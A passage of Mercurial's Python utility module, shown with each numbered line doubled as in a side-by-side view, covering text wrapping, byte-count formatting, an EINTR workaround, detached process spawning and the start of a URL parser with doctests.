2194 '''get email of author.'''
2194 '''get email of author.'''
2195 r = author.find('>')
2195 r = author.find('>')
2196 if r == -1:
2196 if r == -1:
2197 r = None
2197 r = None
2198 return author[author.find('<') + 1:r]
2198 return author[author.find('<') + 1:r]
2199
2199
2200 def ellipsis(text, maxlength=400):
2200 def ellipsis(text, maxlength=400):
2201 """Trim string to at most maxlength (default: 400) columns in display."""
2201 """Trim string to at most maxlength (default: 400) columns in display."""
2202 return encoding.trim(text, maxlength, ellipsis='...')
2202 return encoding.trim(text, maxlength, ellipsis='...')
2203
2203
2204 def unitcountfn(*unittable):
2204 def unitcountfn(*unittable):
2205 '''return a function that renders a readable count of some quantity'''
2205 '''return a function that renders a readable count of some quantity'''
2206
2206
2207 def go(count):
2207 def go(count):
2208 for multiplier, divisor, format in unittable:
2208 for multiplier, divisor, format in unittable:
2209 if abs(count) >= divisor * multiplier:
2209 if abs(count) >= divisor * multiplier:
2210 return format % (count / float(divisor))
2210 return format % (count / float(divisor))
2211 return unittable[-1][2] % count
2211 return unittable[-1][2] % count
2212
2212
2213 return go
2213 return go
2214
2214
2215 def processlinerange(fromline, toline):
2215 def processlinerange(fromline, toline):
2216 """Check that linerange <fromline>:<toline> makes sense and return a
2216 """Check that linerange <fromline>:<toline> makes sense and return a
2217 0-based range.
2217 0-based range.
2218
2218
2219 >>> processlinerange(10, 20)
2219 >>> processlinerange(10, 20)
2220 (9, 20)
2220 (9, 20)
2221 >>> processlinerange(2, 1)
2221 >>> processlinerange(2, 1)
2222 Traceback (most recent call last):
2222 Traceback (most recent call last):
2223 ...
2223 ...
2224 ParseError: line range must be positive
2224 ParseError: line range must be positive
2225 >>> processlinerange(0, 5)
2225 >>> processlinerange(0, 5)
2226 Traceback (most recent call last):
2226 Traceback (most recent call last):
2227 ...
2227 ...
2228 ParseError: fromline must be strictly positive
2228 ParseError: fromline must be strictly positive
2229 """
2229 """
2230 if toline - fromline < 0:
2230 if toline - fromline < 0:
2231 raise error.ParseError(_("line range must be positive"))
2231 raise error.ParseError(_("line range must be positive"))
2232 if fromline < 1:
2232 if fromline < 1:
2233 raise error.ParseError(_("fromline must be strictly positive"))
2233 raise error.ParseError(_("fromline must be strictly positive"))
2234 return fromline - 1, toline
2234 return fromline - 1, toline
2235
2235
2236 bytecount = unitcountfn(
2236 bytecount = unitcountfn(
2237 (100, 1 << 30, _('%.0f GB')),
2237 (100, 1 << 30, _('%.0f GB')),
2238 (10, 1 << 30, _('%.1f GB')),
2238 (10, 1 << 30, _('%.1f GB')),
2239 (1, 1 << 30, _('%.2f GB')),
2239 (1, 1 << 30, _('%.2f GB')),
2240 (100, 1 << 20, _('%.0f MB')),
2240 (100, 1 << 20, _('%.0f MB')),
2241 (10, 1 << 20, _('%.1f MB')),
2241 (10, 1 << 20, _('%.1f MB')),
2242 (1, 1 << 20, _('%.2f MB')),
2242 (1, 1 << 20, _('%.2f MB')),
2243 (100, 1 << 10, _('%.0f KB')),
2243 (100, 1 << 10, _('%.0f KB')),
2244 (10, 1 << 10, _('%.1f KB')),
2244 (10, 1 << 10, _('%.1f KB')),
2245 (1, 1 << 10, _('%.2f KB')),
2245 (1, 1 << 10, _('%.2f KB')),
2246 (1, 1, _('%.0f bytes')),
2246 (1, 1, _('%.0f bytes')),
2247 )
2247 )
2248
2248
2249 # Matches a single EOL which can either be a CRLF where repeated CR
2249 # Matches a single EOL which can either be a CRLF where repeated CR
2250 # are removed or a LF. We do not care about old Macintosh files, so a
2250 # are removed or a LF. We do not care about old Macintosh files, so a
2251 # stray CR is an error.
2251 # stray CR is an error.
2252 _eolre = remod.compile(br'\r*\n')
2252 _eolre = remod.compile(br'\r*\n')
2253
2253
2254 def tolf(s):
2254 def tolf(s):
2255 return _eolre.sub('\n', s)
2255 return _eolre.sub('\n', s)
2256
2256
2257 def tocrlf(s):
2257 def tocrlf(s):
2258 return _eolre.sub('\r\n', s)
2258 return _eolre.sub('\r\n', s)
2259
2259
2260 if pycompat.oslinesep == '\r\n':
2260 if pycompat.oslinesep == '\r\n':
2261 tonativeeol = tocrlf
2261 tonativeeol = tocrlf
2262 fromnativeeol = tolf
2262 fromnativeeol = tolf
2263 else:
2263 else:
2264 tonativeeol = pycompat.identity
2264 tonativeeol = pycompat.identity
2265 fromnativeeol = pycompat.identity
2265 fromnativeeol = pycompat.identity
2266
2266
2267 def escapestr(s):
2267 def escapestr(s):
2268 # call underlying function of s.encode('string_escape') directly for
2268 # call underlying function of s.encode('string_escape') directly for
2269 # Python 3 compatibility
2269 # Python 3 compatibility
2270 return codecs.escape_encode(s)[0]
2270 return codecs.escape_encode(s)[0]
2271
2271
2272 def unescapestr(s):
2272 def unescapestr(s):
2273 return codecs.escape_decode(s)[0]
2273 return codecs.escape_decode(s)[0]
2274
2274
2275 def uirepr(s):
2275 def uirepr(s):
2276 # Avoid double backslash in Windows path repr()
2276 # Avoid double backslash in Windows path repr()
2277 return repr(s).replace('\\\\', '\\')
2277 return repr(s).replace('\\\\', '\\')
2278
2278
2279 # delay import of textwrap
2279 # delay import of textwrap
2280 def MBTextWrapper(**kwargs):
2280 def MBTextWrapper(**kwargs):
2281 class tw(textwrap.TextWrapper):
2281 class tw(textwrap.TextWrapper):
2282 """
2282 """
2283 Extend TextWrapper for width-awareness.
2283 Extend TextWrapper for width-awareness.
2284
2284
2285 Neither number of 'bytes' in any encoding nor 'characters' is
2285 Neither number of 'bytes' in any encoding nor 'characters' is
2286 appropriate to calculate terminal columns for specified string.
2286 appropriate to calculate terminal columns for specified string.
2287
2287
2288 Original TextWrapper implementation uses built-in 'len()' directly,
2288 Original TextWrapper implementation uses built-in 'len()' directly,
2289 so overriding is needed to use width information of each characters.
2289 so overriding is needed to use width information of each characters.
2290
2290
2291 In addition, characters classified into 'ambiguous' width are
2291 In addition, characters classified into 'ambiguous' width are
2292 treated as wide in East Asian area, but as narrow in other.
2292 treated as wide in East Asian area, but as narrow in other.
2293
2293
2294 This requires use decision to determine width of such characters.
2294 This requires use decision to determine width of such characters.
2295 """
2295 """
2296 def _cutdown(self, ucstr, space_left):
2296 def _cutdown(self, ucstr, space_left):
2297 l = 0
2297 l = 0
2298 colwidth = encoding.ucolwidth
2298 colwidth = encoding.ucolwidth
2299 for i in xrange(len(ucstr)):
2299 for i in xrange(len(ucstr)):
2300 l += colwidth(ucstr[i])
2300 l += colwidth(ucstr[i])
2301 if space_left < l:
2301 if space_left < l:
2302 return (ucstr[:i], ucstr[i:])
2302 return (ucstr[:i], ucstr[i:])
2303 return ucstr, ''
2303 return ucstr, ''
2304
2304
2305 # overriding of base class
2305 # overriding of base class
2306 def _handle_long_word(self, reversed_chunks, cur_line, cur_len, width):
2306 def _handle_long_word(self, reversed_chunks, cur_line, cur_len, width):
2307 space_left = max(width - cur_len, 1)
2307 space_left = max(width - cur_len, 1)
2308
2308
2309 if self.break_long_words:
2309 if self.break_long_words:
2310 cut, res = self._cutdown(reversed_chunks[-1], space_left)
2310 cut, res = self._cutdown(reversed_chunks[-1], space_left)
2311 cur_line.append(cut)
2311 cur_line.append(cut)
2312 reversed_chunks[-1] = res
2312 reversed_chunks[-1] = res
2313 elif not cur_line:
2313 elif not cur_line:
2314 cur_line.append(reversed_chunks.pop())
2314 cur_line.append(reversed_chunks.pop())
2315
2315
2316 # this overriding code is imported from TextWrapper of Python 2.6
2316 # this overriding code is imported from TextWrapper of Python 2.6
2317 # to calculate columns of string by 'encoding.ucolwidth()'
2317 # to calculate columns of string by 'encoding.ucolwidth()'
2318 def _wrap_chunks(self, chunks):
2318 def _wrap_chunks(self, chunks):
2319 colwidth = encoding.ucolwidth
2319 colwidth = encoding.ucolwidth
2320
2320
2321 lines = []
2321 lines = []
2322 if self.width <= 0:
2322 if self.width <= 0:
2323 raise ValueError("invalid width %r (must be > 0)" % self.width)
2323 raise ValueError("invalid width %r (must be > 0)" % self.width)
2324
2324
2325 # Arrange in reverse order so items can be efficiently popped
2325 # Arrange in reverse order so items can be efficiently popped
2326 # from a stack of chucks.
2326 # from a stack of chucks.
2327 chunks.reverse()
2327 chunks.reverse()
2328
2328
2329 while chunks:
2329 while chunks:
2330
2330
2331 # Start the list of chunks that will make up the current line.
2331 # Start the list of chunks that will make up the current line.
2332 # cur_len is just the length of all the chunks in cur_line.
2332 # cur_len is just the length of all the chunks in cur_line.
2333 cur_line = []
2333 cur_line = []
2334 cur_len = 0
2334 cur_len = 0
2335
2335
2336 # Figure out which static string will prefix this line.
2336 # Figure out which static string will prefix this line.
2337 if lines:
2337 if lines:
2338 indent = self.subsequent_indent
2338 indent = self.subsequent_indent
2339 else:
2339 else:
2340 indent = self.initial_indent
2340 indent = self.initial_indent
2341
2341
2342 # Maximum width for this line.
2342 # Maximum width for this line.
2343 width = self.width - len(indent)
2343 width = self.width - len(indent)
2344
2344
2345 # First chunk on line is whitespace -- drop it, unless this
2345 # First chunk on line is whitespace -- drop it, unless this
2346 # is the very beginning of the text (i.e. no lines started yet).
2346 # is the very beginning of the text (i.e. no lines started yet).
2347 if self.drop_whitespace and chunks[-1].strip() == r'' and lines:
2347 if self.drop_whitespace and chunks[-1].strip() == r'' and lines:
2348 del chunks[-1]
2348 del chunks[-1]
2349
2349
2350 while chunks:
2350 while chunks:
2351 l = colwidth(chunks[-1])
2351 l = colwidth(chunks[-1])
2352
2352
2353 # Can at least squeeze this chunk onto the current line.
2353 # Can at least squeeze this chunk onto the current line.
2354 if cur_len + l <= width:
2354 if cur_len + l <= width:
2355 cur_line.append(chunks.pop())
2355 cur_line.append(chunks.pop())
2356 cur_len += l
2356 cur_len += l
2357
2357
2358 # Nope, this line is full.
2358 # Nope, this line is full.
2359 else:
2359 else:
2360 break
2360 break
2361
2361
2362 # The current line is full, and the next chunk is too big to
2362 # The current line is full, and the next chunk is too big to
2363 # fit on *any* line (not just this one).
2363 # fit on *any* line (not just this one).
2364 if chunks and colwidth(chunks[-1]) > width:
2364 if chunks and colwidth(chunks[-1]) > width:
2365 self._handle_long_word(chunks, cur_line, cur_len, width)
2365 self._handle_long_word(chunks, cur_line, cur_len, width)
2366
2366
2367 # If the last chunk on this line is all whitespace, drop it.
2367 # If the last chunk on this line is all whitespace, drop it.
2368 if (self.drop_whitespace and
2368 if (self.drop_whitespace and
2369 cur_line and cur_line[-1].strip() == r''):
2369 cur_line and cur_line[-1].strip() == r''):
2370 del cur_line[-1]
2370 del cur_line[-1]
2371
2371
2372 # Convert current line back to a string and store it in list
2372 # Convert current line back to a string and store it in list
2373 # of all lines (return value).
2373 # of all lines (return value).
2374 if cur_line:
2374 if cur_line:
2375 lines.append(indent + r''.join(cur_line))
2375 lines.append(indent + r''.join(cur_line))
2376
2376
2377 return lines
2377 return lines
2378
2378
2379 global MBTextWrapper
2379 global MBTextWrapper
2380 MBTextWrapper = tw
2380 MBTextWrapper = tw
2381 return tw(**kwargs)
2381 return tw(**kwargs)
2382
2382
2383 def wrap(line, width, initindent='', hangindent=''):
2383 def wrap(line, width, initindent='', hangindent=''):
2384 maxindent = max(len(hangindent), len(initindent))
2384 maxindent = max(len(hangindent), len(initindent))
2385 if width <= maxindent:
2385 if width <= maxindent:
2386 # adjust for weird terminal size
2386 # adjust for weird terminal size
2387 width = max(78, maxindent + 1)
2387 width = max(78, maxindent + 1)
2388 line = line.decode(pycompat.sysstr(encoding.encoding),
2388 line = line.decode(pycompat.sysstr(encoding.encoding),
2389 pycompat.sysstr(encoding.encodingmode))
2389 pycompat.sysstr(encoding.encodingmode))
2390 initindent = initindent.decode(pycompat.sysstr(encoding.encoding),
2390 initindent = initindent.decode(pycompat.sysstr(encoding.encoding),
2391 pycompat.sysstr(encoding.encodingmode))
2391 pycompat.sysstr(encoding.encodingmode))
2392 hangindent = hangindent.decode(pycompat.sysstr(encoding.encoding),
2392 hangindent = hangindent.decode(pycompat.sysstr(encoding.encoding),
2393 pycompat.sysstr(encoding.encodingmode))
2393 pycompat.sysstr(encoding.encodingmode))
2394 wrapper = MBTextWrapper(width=width,
2394 wrapper = MBTextWrapper(width=width,
2395 initial_indent=initindent,
2395 initial_indent=initindent,
2396 subsequent_indent=hangindent)
2396 subsequent_indent=hangindent)
2397 return wrapper.fill(line).encode(pycompat.sysstr(encoding.encoding))
2397 return wrapper.fill(line).encode(pycompat.sysstr(encoding.encoding))
2398
2398
2399 if (pyplatform.python_implementation() == 'CPython' and
2399 if (pyplatform.python_implementation() == 'CPython' and
2400 sys.version_info < (3, 0)):
2400 sys.version_info < (3, 0)):
2401 # There is an issue in CPython that some IO methods do not handle EINTR
2401 # There is an issue in CPython that some IO methods do not handle EINTR
2402 # correctly. The following table shows what CPython version (and functions)
2402 # correctly. The following table shows what CPython version (and functions)
2403 # are affected (buggy: has the EINTR bug, okay: otherwise):
2403 # are affected (buggy: has the EINTR bug, okay: otherwise):
2404 #
2404 #
2405 # | < 2.7.4 | 2.7.4 to 2.7.12 | >= 3.0
2405 # | < 2.7.4 | 2.7.4 to 2.7.12 | >= 3.0
2406 # --------------------------------------------------
2406 # --------------------------------------------------
2407 # fp.__iter__ | buggy | buggy | okay
2407 # fp.__iter__ | buggy | buggy | okay
2408 # fp.read* | buggy | okay [1] | okay
2408 # fp.read* | buggy | okay [1] | okay
2409 #
2409 #
2410 # [1]: fixed by changeset 67dc99a989cd in the cpython hg repo.
2410 # [1]: fixed by changeset 67dc99a989cd in the cpython hg repo.
2411 #
2411 #
2412 # Here we workaround the EINTR issue for fileobj.__iter__. Other methods
2412 # Here we workaround the EINTR issue for fileobj.__iter__. Other methods
2413 # like "read*" are ignored for now, as Python < 2.7.4 is a minority.
2413 # like "read*" are ignored for now, as Python < 2.7.4 is a minority.
2414 #
2414 #
2415 # Although we can workaround the EINTR issue for fp.__iter__, it is slower:
2415 # Although we can workaround the EINTR issue for fp.__iter__, it is slower:
2416 # "for x in fp" is 4x faster than "for x in iter(fp.readline, '')" in
2416 # "for x in fp" is 4x faster than "for x in iter(fp.readline, '')" in
2417 # CPython 2, because CPython 2 maintains an internal readahead buffer for
2417 # CPython 2, because CPython 2 maintains an internal readahead buffer for
2418 # fp.__iter__ but not other fp.read* methods.
2418 # fp.__iter__ but not other fp.read* methods.
2419 #
2419 #
2420 # On modern systems like Linux, the "read" syscall cannot be interrupted
2420 # On modern systems like Linux, the "read" syscall cannot be interrupted
2421 # when reading "fast" files like on-disk files. So the EINTR issue only
2421 # when reading "fast" files like on-disk files. So the EINTR issue only
2422 # affects things like pipes, sockets, ttys etc. We treat "normal" (S_ISREG)
2422 # affects things like pipes, sockets, ttys etc. We treat "normal" (S_ISREG)
2423 # files approximately as "fast" files and use the fast (unsafe) code path,
2423 # files approximately as "fast" files and use the fast (unsafe) code path,
2424 # to minimize the performance impact.
2424 # to minimize the performance impact.
2425 if sys.version_info >= (2, 7, 4):
2425 if sys.version_info >= (2, 7, 4):
2426 # fp.readline deals with EINTR correctly, use it as a workaround.
2426 # fp.readline deals with EINTR correctly, use it as a workaround.
2427 def _safeiterfile(fp):
2427 def _safeiterfile(fp):
2428 return iter(fp.readline, '')
2428 return iter(fp.readline, '')
2429 else:
2429 else:
2430 # fp.read* are broken too, manually deal with EINTR in a stupid way.
2430 # fp.read* are broken too, manually deal with EINTR in a stupid way.
2431 # note: this may block longer than necessary because of bufsize.
2431 # note: this may block longer than necessary because of bufsize.
2432 def _safeiterfile(fp, bufsize=4096):
2432 def _safeiterfile(fp, bufsize=4096):
2433 fd = fp.fileno()
2433 fd = fp.fileno()
2434 line = ''
2434 line = ''
2435 while True:
2435 while True:
2436 try:
2436 try:
2437 buf = os.read(fd, bufsize)
2437 buf = os.read(fd, bufsize)
2438 except OSError as ex:
2438 except OSError as ex:
2439 # os.read only raises EINTR before any data is read
2439 # os.read only raises EINTR before any data is read
2440 if ex.errno == errno.EINTR:
2440 if ex.errno == errno.EINTR:
2441 continue
2441 continue
2442 else:
2442 else:
2443 raise
2443 raise
2444 line += buf
2444 line += buf
2445 if '\n' in buf:
2445 if '\n' in buf:
2446 splitted = line.splitlines(True)
2446 splitted = line.splitlines(True)
2447 line = ''
2447 line = ''
2448 for l in splitted:
2448 for l in splitted:
2449 if l[-1] == '\n':
2449 if l[-1] == '\n':
2450 yield l
2450 yield l
2451 else:
2451 else:
2452 line = l
2452 line = l
2453 if not buf:
2453 if not buf:
2454 break
2454 break
2455 if line:
2455 if line:
2456 yield line
2456 yield line
2457
2457
2458 def iterfile(fp):
2458 def iterfile(fp):
2459 fastpath = True
2459 fastpath = True
2460 if type(fp) is file:
2460 if type(fp) is file:
2461 fastpath = stat.S_ISREG(os.fstat(fp.fileno()).st_mode)
2461 fastpath = stat.S_ISREG(os.fstat(fp.fileno()).st_mode)
2462 if fastpath:
2462 if fastpath:
2463 return fp
2463 return fp
2464 else:
2464 else:
2465 return _safeiterfile(fp)
2465 return _safeiterfile(fp)
2466 else:
2466 else:
2467 # PyPy and CPython 3 do not have the EINTR issue thus no workaround needed.
2467 # PyPy and CPython 3 do not have the EINTR issue thus no workaround needed.
2468 def iterfile(fp):
2468 def iterfile(fp):
2469 return fp
2469 return fp
2470
2470
2471 def iterlines(iterator):
2471 def iterlines(iterator):
2472 for chunk in iterator:
2472 for chunk in iterator:
2473 for line in chunk.splitlines():
2473 for line in chunk.splitlines():
2474 yield line
2474 yield line
2475
2475
2476 def expandpath(path):
2476 def expandpath(path):
2477 return os.path.expanduser(os.path.expandvars(path))
2477 return os.path.expanduser(os.path.expandvars(path))
2478
2478
2479 def hgcmd():
2479 def hgcmd():
2480 """Return the command used to execute current hg
2480 """Return the command used to execute current hg
2481
2481
2482 This is different from hgexecutable() because on Windows we want
2482 This is different from hgexecutable() because on Windows we want
2483 to avoid things opening new shell windows like batch files, so we
2483 to avoid things opening new shell windows like batch files, so we
2484 get either the python call or current executable.
2484 get either the python call or current executable.
2485 """
2485 """
2486 if mainfrozen():
2486 if mainfrozen():
2487 if getattr(sys, 'frozen', None) == 'macosx_app':
2487 if getattr(sys, 'frozen', None) == 'macosx_app':
2488 # Env variable set by py2app
2488 # Env variable set by py2app
2489 return [encoding.environ['EXECUTABLEPATH']]
2489 return [encoding.environ['EXECUTABLEPATH']]
2490 else:
2490 else:
2491 return [pycompat.sysexecutable]
2491 return [pycompat.sysexecutable]
2492 return gethgcmd()
2492 return gethgcmd()
2493
2493
2494 def rundetached(args, condfn):
2494 def rundetached(args, condfn):
2495 """Execute the argument list in a detached process.
2495 """Execute the argument list in a detached process.
2496
2496
2497 condfn is a callable which is called repeatedly and should return
2497 condfn is a callable which is called repeatedly and should return
2498 True once the child process is known to have started successfully.
2498 True once the child process is known to have started successfully.
2499 At this point, the child process PID is returned. If the child
2499 At this point, the child process PID is returned. If the child
2500 process fails to start or finishes before condfn() evaluates to
2500 process fails to start or finishes before condfn() evaluates to
2501 True, return -1.
2501 True, return -1.
2502 """
2502 """
2503 # Windows case is easier because the child process is either
2503 # Windows case is easier because the child process is either
2504 # successfully starting and validating the condition or exiting
2504 # successfully starting and validating the condition or exiting
2505 # on failure. We just poll on its PID. On Unix, if the child
2505 # on failure. We just poll on its PID. On Unix, if the child
2506 # process fails to start, it will be left in a zombie state until
2506 # process fails to start, it will be left in a zombie state until
2507 # the parent wait on it, which we cannot do since we expect a long
2507 # the parent wait on it, which we cannot do since we expect a long
2508 # running process on success. Instead we listen for SIGCHLD telling
2508 # running process on success. Instead we listen for SIGCHLD telling
2509 # us our child process terminated.
2509 # us our child process terminated.
2510 terminated = set()
2510 terminated = set()
2511 def handler(signum, frame):
2511 def handler(signum, frame):
2512 terminated.add(os.wait())
2512 terminated.add(os.wait())
2513 prevhandler = None
2513 prevhandler = None
2514 SIGCHLD = getattr(signal, 'SIGCHLD', None)
2514 SIGCHLD = getattr(signal, 'SIGCHLD', None)
2515 if SIGCHLD is not None:
2515 if SIGCHLD is not None:
2516 prevhandler = signal.signal(SIGCHLD, handler)
2516 prevhandler = signal.signal(SIGCHLD, handler)
2517 try:
2517 try:
2518 pid = spawndetached(args)
2518 pid = spawndetached(args)
2519 while not condfn():
2519 while not condfn():
2520 if ((pid in terminated or not testpid(pid))
2520 if ((pid in terminated or not testpid(pid))
2521 and not condfn()):
2521 and not condfn()):
2522 return -1
2522 return -1
2523 time.sleep(0.1)
2523 time.sleep(0.1)
2524 return pid
2524 return pid
2525 finally:
2525 finally:
2526 if prevhandler is not None:
2526 if prevhandler is not None:
2527 signal.signal(signal.SIGCHLD, prevhandler)
2527 signal.signal(signal.SIGCHLD, prevhandler)
2528
2528
2529 def interpolate(prefix, mapping, s, fn=None, escape_prefix=False):
2529 def interpolate(prefix, mapping, s, fn=None, escape_prefix=False):
2530 """Return the result of interpolating items in the mapping into string s.
2530 """Return the result of interpolating items in the mapping into string s.
2531
2531
2532 prefix is a single character string, or a two character string with
2532 prefix is a single character string, or a two character string with
2533 a backslash as the first character if the prefix needs to be escaped in
2533 a backslash as the first character if the prefix needs to be escaped in
2534 a regular expression.
2534 a regular expression.
2535
2535
2536 fn is an optional function that will be applied to the replacement text
2536 fn is an optional function that will be applied to the replacement text
2537 just before replacement.
2537 just before replacement.
2538
2538
2539 escape_prefix is an optional flag that allows using doubled prefix for
2539 escape_prefix is an optional flag that allows using doubled prefix for
2540 its escaping.
2540 its escaping.
2541 """
2541 """
2542 fn = fn or (lambda s: s)
2542 fn = fn or (lambda s: s)
2543 patterns = '|'.join(mapping.keys())
2543 patterns = '|'.join(mapping.keys())
2544 if escape_prefix:
2544 if escape_prefix:
2545 patterns += '|' + prefix
2545 patterns += '|' + prefix
2546 if len(prefix) > 1:
2546 if len(prefix) > 1:
2547 prefix_char = prefix[1:]
2547 prefix_char = prefix[1:]
2548 else:
2548 else:
2549 prefix_char = prefix
2549 prefix_char = prefix
2550 mapping[prefix_char] = prefix_char
2550 mapping[prefix_char] = prefix_char
2551 r = remod.compile(r'%s(%s)' % (prefix, patterns))
2551 r = remod.compile(r'%s(%s)' % (prefix, patterns))
2552 return r.sub(lambda x: fn(mapping[x.group()[1:]]), s)
2552 return r.sub(lambda x: fn(mapping[x.group()[1:]]), s)
2553
2553
2554 def getport(port):
2554 def getport(port):
2555 """Return the port for a given network service.
2555 """Return the port for a given network service.
2556
2556
2557 If port is an integer, it's returned as is. If it's a string, it's
2557 If port is an integer, it's returned as is. If it's a string, it's
2558 looked up using socket.getservbyname(). If there's no matching
2558 looked up using socket.getservbyname(). If there's no matching
2559 service, error.Abort is raised.
2559 service, error.Abort is raised.
2560 """
2560 """
2561 try:
2561 try:
2562 return int(port)
2562 return int(port)
2563 except ValueError:
2563 except ValueError:
2564 pass
2564 pass
2565
2565
2566 try:
2566 try:
2567 return socket.getservbyname(port)
2567 return socket.getservbyname(port)
2568 except socket.error:
2568 except socket.error:
2569 raise Abort(_("no port number associated with service '%s'") % port)
2569 raise Abort(_("no port number associated with service '%s'") % port)
2570
2570
2571 _booleans = {'1': True, 'yes': True, 'true': True, 'on': True, 'always': True,
2571 _booleans = {'1': True, 'yes': True, 'true': True, 'on': True, 'always': True,
2572 '0': False, 'no': False, 'false': False, 'off': False,
2572 '0': False, 'no': False, 'false': False, 'off': False,
2573 'never': False}
2573 'never': False}
2574
2574
2575 def parsebool(s):
2575 def parsebool(s):
2576 """Parse s into a boolean.
2576 """Parse s into a boolean.
2577
2577
2578 If s is not a valid boolean, returns None.
2578 If s is not a valid boolean, returns None.
2579 """
2579 """
2580 return _booleans.get(s.lower(), None)
2580 return _booleans.get(s.lower(), None)
2581
2581
2582 _hextochr = dict((a + b, chr(int(a + b, 16)))
2582 _hextochr = dict((a + b, chr(int(a + b, 16)))
2583 for a in string.hexdigits for b in string.hexdigits)
2583 for a in string.hexdigits for b in string.hexdigits)
2584
2584
2585 class url(object):
2585 class url(object):
2586 r"""Reliable URL parser.
2586 r"""Reliable URL parser.
2587
2587
2588 This parses URLs and provides attributes for the following
2588 This parses URLs and provides attributes for the following
2589 components:
2589 components:
2590
2590
2591 <scheme>://<user>:<passwd>@<host>:<port>/<path>?<query>#<fragment>
2591 <scheme>://<user>:<passwd>@<host>:<port>/<path>?<query>#<fragment>
2592
2592
2593 Missing components are set to None. The only exception is
2593 Missing components are set to None. The only exception is
2594 fragment, which is set to '' if present but empty.
2594 fragment, which is set to '' if present but empty.
2595
2595
2596 If parsefragment is False, fragment is included in query. If
2596 If parsefragment is False, fragment is included in query. If
2597 parsequery is False, query is included in path. If both are
2597 parsequery is False, query is included in path. If both are
2598 False, both fragment and query are included in path.
2598 False, both fragment and query are included in path.
2599
2599
2600 See http://www.ietf.org/rfc/rfc2396.txt for more information.
2600 See http://www.ietf.org/rfc/rfc2396.txt for more information.
2601
2601
2602 Note that for backward compatibility reasons, bundle URLs do not
2602 Note that for backward compatibility reasons, bundle URLs do not
2603 take host names. That means 'bundle://../' has a path of '../'.
2603 take host names. That means 'bundle://../' has a path of '../'.
2604
2604
2605 Examples:
2605 Examples:
2606
2606
2607 >>> url('http://www.ietf.org/rfc/rfc2396.txt')
2607 >>> url('http://www.ietf.org/rfc/rfc2396.txt')
2608 <url scheme: 'http', host: 'www.ietf.org', path: 'rfc/rfc2396.txt'>
2608 <url scheme: 'http', host: 'www.ietf.org', path: 'rfc/rfc2396.txt'>
2609 >>> url('ssh://[::1]:2200//home/joe/repo')
2609 >>> url('ssh://[::1]:2200//home/joe/repo')
2610 <url scheme: 'ssh', host: '[::1]', port: '2200', path: '/home/joe/repo'>
2610 <url scheme: 'ssh', host: '[::1]', port: '2200', path: '/home/joe/repo'>
2611 >>> url('file:///home/joe/repo')
2611 >>> url('file:///home/joe/repo')
2612 <url scheme: 'file', path: '/home/joe/repo'>
2612 <url scheme: 'file', path: '/home/joe/repo'>
2613 >>> url('file:///c:/temp/foo/')
2613 >>> url('file:///c:/temp/foo/')
2614 <url scheme: 'file', path: 'c:/temp/foo/'>
2614 <url scheme: 'file', path: 'c:/temp/foo/'>
2615 >>> url('bundle:foo')
2615 >>> url('bundle:foo')
2616 <url scheme: 'bundle', path: 'foo'>
2616 <url scheme: 'bundle', path: 'foo'>
2617 >>> url('bundle://../foo')
2617 >>> url('bundle://../foo')
2618 <url scheme: 'bundle', path: '../foo'>
2618 <url scheme: 'bundle', path: '../foo'>
2619 >>> url(r'c:\foo\bar')
2619 >>> url(r'c:\foo\bar')
2620 <url path: 'c:\\foo\\bar'>
2620 <url path: 'c:\\foo\\bar'>
2621 >>> url(r'\\blah\blah\blah')
2621 >>> url(r'\\blah\blah\blah')
2622 <url path: '\\\\blah\\blah\\blah'>
2622 <url path: '\\\\blah\\blah\\blah'>
2623 >>> url(r'\\blah\blah\blah#baz')
2623 >>> url(r'\\blah\blah\blah#baz')
2624 <url path: '\\\\blah\\blah\\blah', fragment: 'baz'>
2624 <url path: '\\\\blah\\blah\\blah', fragment: 'baz'>
2625 >>> url(r'file:///C:\users\me')
2625 >>> url(r'file:///C:\users\me')
2626 <url scheme: 'file', path: 'C:\\users\\me'>
2626 <url scheme: 'file', path: 'C:\\users\\me'>
2627
2627
2628 Authentication credentials:
2628 Authentication credentials:
2629
2629
2630 >>> url('ssh://joe:xyz@x/repo')
2630 >>> url('ssh://joe:xyz@x/repo')
2631 <url scheme: 'ssh', user: 'joe', passwd: 'xyz', host: 'x', path: 'repo'>
2631 <url scheme: 'ssh', user: 'joe', passwd: 'xyz', host: 'x', path: 'repo'>
2632 >>> url('ssh://joe@x/repo')
2632 >>> url('ssh://joe@x/repo')
2633 <url scheme: 'ssh', user: 'joe', host: 'x', path: 'repo'>
2633 <url scheme: 'ssh', user: 'joe', host: 'x', path: 'repo'>
2634
2634
2635 Query strings and fragments:
2635 Query strings and fragments:
2636
2636
2637 >>> url('http://host/a?b#c')
2637 >>> url('http://host/a?b#c')
2638 <url scheme: 'http', host: 'host', path: 'a', query: 'b', fragment: 'c'>
2638 <url scheme: 'http', host: 'host', path: 'a', query: 'b', fragment: 'c'>
2639 >>> url('http://host/a?b#c', parsequery=False, parsefragment=False)
2639 >>> url('http://host/a?b#c', parsequery=False, parsefragment=False)
2640 <url scheme: 'http', host: 'host', path: 'a?b#c'>
2640 <url scheme: 'http', host: 'host', path: 'a?b#c'>
2641
2641
2642 Empty path:
2642 Empty path:
2643
2643
2644 >>> url('')
2644 >>> url('')
2645 <url path: ''>
2645 <url path: ''>
2646 >>> url('#a')
2646 >>> url('#a')
2647 <url path: '', fragment: 'a'>
2647 <url path: '', fragment: 'a'>
2648 >>> url('http://host/')
2648 >>> url('http://host/')
2649 <url scheme: 'http', host: 'host', path: ''>
2649 <url scheme: 'http', host: 'host', path: ''>
2650 >>> url('http://host/#a')
2650 >>> url('http://host/#a')
2651 <url scheme: 'http', host: 'host', path: '', fragment: 'a'>
2651 <url scheme: 'http', host: 'host', path: '', fragment: 'a'>
2652
2652
2653 Only scheme:
2653 Only scheme:
2654
2654
2655 >>> url('http:')
2655 >>> url('http:')
2656 <url scheme: 'http'>
2656 <url scheme: 'http'>
2657 """
2657 """
2658
2658
2659 _safechars = "!~*'()+"
2659 _safechars = "!~*'()+"
2660 _safepchars = "/!~*'()+:\\"
2660 _safepchars = "/!~*'()+:\\"
2661 _matchscheme = remod.compile('^[a-zA-Z0-9+.\\-]+:').match
2661 _matchscheme = remod.compile('^[a-zA-Z0-9+.\\-]+:').match
2662
2662
2663 def __init__(self, path, parsequery=True, parsefragment=True):
2663 def __init__(self, path, parsequery=True, parsefragment=True):
2664 # We slowly chomp away at path until we have only the path left
2664 # We slowly chomp away at path until we have only the path left
2665 self.scheme = self.user = self.passwd = self.host = None
2665 self.scheme = self.user = self.passwd = self.host = None
2666 self.port = self.path = self.query = self.fragment = None
2666 self.port = self.path = self.query = self.fragment = None
2667 self._localpath = True
2667 self._localpath = True
2668 self._hostport = ''
